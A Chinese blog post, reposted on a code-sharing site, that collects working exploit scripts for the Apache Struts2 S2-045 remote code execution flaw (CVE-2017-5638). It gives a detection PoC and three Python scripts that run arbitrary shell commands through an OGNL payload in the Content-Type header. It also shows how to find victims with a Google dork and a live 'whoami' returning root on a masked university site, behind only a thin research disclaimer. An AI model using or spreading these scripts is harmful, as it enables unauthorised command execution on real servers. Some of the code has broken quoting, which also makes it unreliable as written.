码迷,mamicode.com
首页 > 其他好文 > 详细

S2-045漏洞利用脚本汇总

时间:2017-03-08 10:57:03      阅读:3083      评论:0      收藏:0      [点我收藏+]

标签:ber   自身   down   multipart   for   roo   headers   ack   partial   

申明:本文所介绍的脚本和方法均来自互联网,收集的目的仅供安全研究使用,网站运维人员可以使用本文介绍的脚本和方法评估自身网站的安全性,并尽快发现和修复网站存在的漏洞。对于使用本文脚本和方法所造成的任何后果,由使用者自行承担,作者不承担任何后果。

S2-045漏洞为一个远程RCE漏洞,利用该漏洞不需要任何的前提条件,因此危害巨大,估计又会造成一场腥风血雨。

漏洞POC如下:

import requests
import sys
 
def poc(url):
    payload = "%{(#test=‘multipart/form-data‘).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container‘]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"
    headers = {}
    headers["Content-Type"] = payload
    r = requests.get(url, headers=headers)
    if "105059592" in r.content:
        return True
    return False
if __name__ == __main__:
    if len(sys.argv) == 1:
        print "python s2-045.py target"
        sys.exit()
    if poc(sys.argv[1]):
        print "vulnerable"
    else:
        print "not vulnerable"

利用代码1

目前一个主要的漏洞利用EXP如下:

#!/usr/bin/python
# -*- coding: utf-8 -*-

import urllib2
import httplib


def exploit(url, cmd):
    payload = "%{(#_=‘multipart/form-data‘)."
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context[‘com.opensymphony.xwork2.ActionContext.container‘])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(#cmd=‘%s‘)." % cmd
    payload += "(#iswin=(@java.lang.System@getProperty(‘os.name‘).toLowerCase().contains(‘win‘)))."
    payload += "(#cmds=(#iswin?{‘cmd.exe‘,‘/c‘,#cmd}:{‘/bin/bash‘,‘-c‘,#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"

    try:
        headers = {User-Agent: Mozilla/5.0, Content-Type: payload}
        request = urllib2.Request(url, headers=headers)
        page = urllib2.urlopen(request).read()
    except httplib.IncompleteRead, e:
        page = e.partial

    print(page)
    return page


if __name__ == __main__:
    import sys
    if len(sys.argv) != 3:
        print("[*] struts2_S2-045.py <url> <cmd>")
    else:
        print([*] CVE: 2017-5638 - Apache Struts2 S2-045)
        url = sys.argv[1]
        cmd = sys.argv[2]
        print("[*] cmd: %s\n" % cmd)
        exploit(url, cmd)

怎样寻找目标?太简单了,用google hacking。在搜索引擎中寻找目标很简单:inurl .action

技术分享

目测目前80%以上的网站还没有升级,因此找到的目标一测一个准:

root@kali64:/home/pentest# ./s2-045.py http://www.****.edu.cn/graduate.action "whoami"
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: whoami

root

广大的网站管理员们尽快行动起来吧,估计很多网站都已经被拿下了,如果目前你的网站还没有被拿下,那么不需要恭喜你,因为那是你的网站价值不够高 :)))

利用脚本2

#! /usr/bin/env python
# encoding:utf-8
import urllib2
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
def poc():
    register_openers()
    datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
    header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
    header["Content-Type"]="%{(#nike=‘multipart/form-data‘).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container‘]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘ifconfig‘).(#iswin=(@java.lang.System@getProperty(‘os.name‘).toLowerCase().contains(‘win‘))).(#cmds=(#iswin?{‘cmd.exe‘,‘/c‘,#cmd}:{‘/bin/bash‘,‘-c‘,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    request = urllib2.Request(str(sys.argv[1]),datagen,headers=header)
    response = urllib2.urlopen(request)
    print response.read()
poc()

 利用脚本3

#encoding:utf-8

import urllib2

from poster.encode import multipart_encode

from poster.streaminghttp import register_openers

def poc(w_url):

    cmd = raw_input(command  \n)

    register_openers()

    datagen, header = multipart_encode({"image1": 23333})

    header[

        "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"

    header[

        "Content-Type"] = "%{(#nike=‘multipart/form-data‘).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)(#container=#context[‘com.opensymphony.xwork2.ActionContext.container‘]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘" + cmd + "‘).(#iswin=(@java.lang.System@getProperty(‘os.name‘).toLowerCase().contains(‘win‘))).(#cmds=(#iswin?{‘cmd.exe‘,‘/c‘,#cmd}:{‘/bin/bash‘,‘-c‘,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

    request = urllib2.Request(w_url, datagen, headers=header)

    response = urllib2.urlopen(request).read()

    print(response)

if __name__==__main__:

    print blog :  http://www.cuijianxiong.com

    w_url = raw_input(addrs : \n)

    is_shutdown = 1

    while is_shutdown == 1:

        poc(w_url)

 

S2-045漏洞利用脚本汇总

标签:ber   自身   down   multipart   for   roo   headers   ack   partial   

原文地址:http://www.cnblogs.com/gsharpsh00ter/p/6517952.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!